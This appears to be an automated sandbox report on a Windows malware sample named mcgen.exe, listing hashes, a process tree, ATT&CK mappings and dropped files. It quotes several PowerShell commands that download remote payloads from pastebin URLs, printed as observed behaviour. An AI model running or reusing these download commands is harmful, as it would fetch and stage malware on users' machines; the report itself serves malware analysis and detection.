a8e8f8be57220f28c70784b6cd2cd57d2d0bff4d492e25de0c7204d268057ecc

Analysis

max time kernel
120s
max time network
123s
platform
windows10-2004_x64
resource
win10v2004-20221111-es
resource tags

arch:x64arch:x86image:win10v2004-20221111-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
03-02-2023 16:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mcgen.exe
Size

298KB
MD5

189246d3e95dcd53c1568356753c6e4a
SHA1

4b84b13c336da522eb8f99c7ec452167d70beea2
SHA256

a8e8f8be57220f28c70784b6cd2cd57d2d0bff4d492e25de0c7204d268057ecc
SHA512

a940136742bf947e04943b2c3a3cfd58a66c763b1c812a2f02cf29698c08bddca591deebb99caf977d9aa418fb21fd077fabf886a891cceadb9d122e5710e810
SSDEEP

3072:o7DhdC6kzWypvaQ0FxyNTBfqtja3r5MA0L5veDfOKVYUtdRGUNtRGi246Li:oBlkZvaF4NTBiov0LA1tRxNU4/

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://pastebin.com/raw/eRD2L2zm

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://pastebin.com/raw/AenkSFLe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://pastebin.com/raw/AuvYYBuV

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://pastebin.com/raw/FjW4pPaZ

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://pastebin.com/raw/WfBEBmP0

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
6	4124	powershell.exe
12	3652	powershell.exe
13	4468	powershell.exe
14	4524	powershell.exe
15	4152	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4124	powershell.exe
4124	powershell.exe
3652	powershell.exe
3652	powershell.exe
4468	powershell.exe
4468	powershell.exe
4524	powershell.exe
4524	powershell.exe
4152	powershell.exe
4152	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4124	powershell.exe
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeDebugPrivilege	4524	powershell.exe
Token: SeDebugPrivilege	4152	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 4992 wrote to memory of 4772	4992	mcgen.exe	82
PID 4992 wrote to memory of 4772	4992	mcgen.exe	82
PID 4772 wrote to memory of 2344	4772	cmd.exe	83
PID 4772 wrote to memory of 2344	4772	cmd.exe	83
PID 4772 wrote to memory of 4124	4772	cmd.exe	84
PID 4772 wrote to memory of 4124	4772	cmd.exe	84
PID 4772 wrote to memory of 3652	4772	cmd.exe	85
PID 4772 wrote to memory of 3652	4772	cmd.exe	85
PID 4772 wrote to memory of 4468	4772	cmd.exe	88
PID 4772 wrote to memory of 4468	4772	cmd.exe	88
PID 4772 wrote to memory of 4524	4772	cmd.exe	90
PID 4772 wrote to memory of 4524	4772	cmd.exe	90
PID 4772 wrote to memory of 4152	4772	cmd.exe	92
PID 4772 wrote to memory of 4152	4772	cmd.exe	92
PID 4772 wrote to memory of 644	4772	cmd.exe	93
PID 4772 wrote to memory of 644	4772	cmd.exe	93
PID 4772 wrote to memory of 4108	4772	cmd.exe	98
PID 4772 wrote to memory of 4108	4772	cmd.exe	98
PID 4772 wrote to memory of 5068	4772	cmd.exe	99
PID 4772 wrote to memory of 5068	4772	cmd.exe	99

C:\Users\Admin\AppData\Local\Temp\mcgen.exe
"C:\Users\Admin\AppData\Local\Temp\mcgen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4992
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\740C.tmp\740D.tmp\740E.bat C:\Users\Admin\AppData\Local\Temp\mcgen.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4772
- - C:\Windows\system32\chcp.com
    "C:\Windows\system32\chcp.com" 65001
    3⤵
    PID:2344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/eRD2L2zm', 'update.txt')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/AenkSFLe', 'loop3.txt')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/AuvYYBuV', 'loop2.txt')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4468
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/FjW4pPaZ', 'loop1.txt')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/WfBEBmP0', 'code.txt')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4152
- - C:\Windows\system32\mode.com
    mode con cols=90 lines=7
    3⤵
    PID:644
- - C:\Windows\system32\mode.com
    mode con cols=90 lines=7
    3⤵
    PID:4108
- - C:\Windows\system32\mode.com
    mode con cols=90 lines=7
    3⤵
    PID:5068

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ba03230c281aedaa8e4170a404f22067

SHA1
851787fa1013ef26f937cf3c5f484c8edc794522

SHA256
e4ab00ef4ec670d68cb3b083dc680ca4587d20b66a4dbf38672f5d910af47ce0

SHA512
75bd019b72a7eda981485cc1ec3ad45a81fe28c51d4b72b5512f209ecc4072e4570772145dec343b11596d1f93aef919762e7a977b42ea95d37cb35ba67e6a6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
975ebb95b92d2a4552231eff47162c28

SHA1
a1fee5f014712bcec8e4f8f869ce0c96a2227fbb

SHA256
1c811b0b519396f9e0fe61a244cd84b27ce2f0143a40b962ce80424cd0fb89ec

SHA512
9e06a41561b4cdd276509a1982b60a0eaf9b38e2833ea44d2c43acaf98f267fe8056ceae65af74660946eb3b5d5d7bfa17f2eae5a637284e97eec2ec17343776

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a48f2776135705c22b55b6b0c5b852e8

SHA1
ce47e7e3dc03fb4b94b9dffc45e1ead7ee4f2f6a

SHA256
f92cc6eaec5fc2c2bfe8f9d4fd5e0939ff5925997af4cfe561c46cf8ffd66c18

SHA512
dec80dccd3e0e8716631173290cd181024c5aacbb00ce323d0ed2bb9698d037098af911a5411dc58b4d35774e8ff4eb6206cb689311d90c1c93e26e1d40dcacf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8a12c129e02e3d0e0ff14020158d6e53

SHA1
383434d0df826622f06b1f3811124782df21507b

SHA256
e0c11799edb944329f9ec85fd54a7038ea7df63d6a07162bc36fc03edb1bceb7

SHA512
4b6f2a88fc882ea9c05e9d8819114e35f30deae4366eafd1ec509d87cb02a26f2441b987272713725cbab9684233309e084802e7475876917fe9d6ab9e9cd05d

Download Submit
C:\Users\Admin\AppData\Local\Temp\740C.tmp\740D.tmp\740E.bat

Filesize
54KB

MD5
e999c546f7476bfe4ba7faf35ad1f986

SHA1
f43c1d1f1c3855c602d20b141d30ea320aa96016

SHA256
006f1ccd22e024789b67b900b1a12fe2268bd9851cdf3a051d6ec973b4e08b2f

SHA512
bbdf5265a7f1c04b29f8f22a2f06296df22bc1002004fcd72dee705a4ae66c63c4539ff8a473e63a1a5ac0196bf09316200d5e25f78657aba4b7b11d2fd6282a

Download Submit
C:\Users\Admin\AppData\Local\Temp\code.txt

Filesize
96B

MD5
fa440e9d2159000b284398cb1a98b34f

SHA1
fbb4c7c3a72ca2355d2a3711e3bf1f4459f35f5c

SHA256
2a00413f6bc43fdca98d9fdcbe45ef46eb594e1dbebaaf56686c6e97af846bf2

SHA512
0927166893376063e654a78801b29ae0822ff0173f7a1f89df72cc369bab778a92389b56f10e535276189d1ae88dba404b16414a77e17b449f94445a12707954

Download Submit
C:\Users\Admin\AppData\Local\Temp\loop1.txt

Filesize
33B

MD5
1f64dca3eba521d54bedbf22f7922608

SHA1
ce8e081f1c251ea7cb842ade6b87c82b30c97b4f

SHA256
1e62402d0d276d976f6a4a5663ee0da55ef5752a040b046b8eb76f57bb4aad0a

SHA512
0431193c957b355e4ae5f6e4b26a386d8371d0ab299c5ed0c2093191e028ea05f04855566f1df6e3d4be54b05b854869ad14d98f21ef8bc6c9c9ea407e82da28

Download Submit
C:\Users\Admin\AppData\Local\Temp\loop2.txt

Filesize
33B

MD5
49411268a6b48425b622c69282ceaa1c

SHA1
700ebaff352e2742c36ee10157004523fcb390fc

SHA256
cd35aa224a9fa279a36a3d227c0b8a4b262824d21ea0ec6625f04a766702f130

SHA512
96b26bbebf0cc90713747135b375e70178e6922f7da4b7be52669d1368abd6c78f5a6844e4bce390bc7bb39b3ead80bcb0c72522d1e4e8f70f1ff4ce0d91abdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\loop3.txt

Filesize
33B

MD5
dd8ddab0459f1e3d629a7c1dee44728c

SHA1
071adfdf6951db31647d760ed1525c578d87af17

SHA256
ddee5a6284b9dd2e4a5e1ee75e4ba3f66812e839283a51828bcc493f1649c825

SHA512
fe8098944327b880d6881f92ffb5f7aedd8b8a2b21668450c0aada5018ed4b5e7aaa5f541a93c5745cf06af33cf7713c42f667be0316aac8964a9a56d0dd0da5

Download Submit
C:\Users\Admin\AppData\Local\Temp\update.txt

Filesize
2B

MD5
7fa3b767c460b54a2be4d49030b349c7

SHA1
fd1286353570c5703799ba76999323b7c7447b06

SHA256
9390298f3fb0c5b160498935d79cb139aef28e1c47358b4bbba61862b9c26e59

SHA512
22494af556a0782623729d0b5a9878f80aa6c21a6f51d346771842d613f51073c3b02fab211baff42fb1998f38b77250dc7a1c71dd98b4b00cae9620a6102ad7

Download Submit
memory/3652-146-0x00007FFA05DD0000-0x00007FFA06891000-memory.dmp

Filesize
10.8MB

Download
memory/3652-147-0x00007FFA05DD0000-0x00007FFA06891000-memory.dmp

Filesize
10.8MB

Download
memory/4124-140-0x00007FFA05DD0000-0x00007FFA06891000-memory.dmp

Filesize
10.8MB

Download
memory/4124-139-0x000001BAB3CC0000-0x000001BAB3DC2000-memory.dmp

Filesize
1.0MB

Download
memory/4124-136-0x000001BAB3A20000-0x000001BAB3AA2000-memory.dmp

Filesize
520KB

Download
memory/4124-141-0x00007FFA05DD0000-0x00007FFA06891000-memory.dmp

Filesize
10.8MB

Download
memory/4124-137-0x000001BA9AB90000-0x000001BA9ABB2000-memory.dmp

Filesize
136KB

Download
memory/4124-138-0x000001BA98EF0000-0x000001BA98F00000-memory.dmp

Filesize
64KB

Download
memory/4152-162-0x00007FFA05DD0000-0x00007FFA06891000-memory.dmp

Filesize
10.8MB

Download
memory/4152-161-0x00007FFA05DD0000-0x00007FFA06891000-memory.dmp

Filesize
10.8MB

Download
memory/4468-152-0x00007FFA05DD0000-0x00007FFA06891000-memory.dmp

Filesize
10.8MB

Download
memory/4468-151-0x00007FFA05DD0000-0x00007FFA06891000-memory.dmp

Filesize
10.8MB

Download
memory/4524-157-0x00007FFA05DD0000-0x00007FFA06891000-memory.dmp

Filesize
10.8MB

Download
memory/4524-156-0x00007FFA05DD0000-0x00007FFA06891000-memory.dmp

Filesize
10.8MB

Download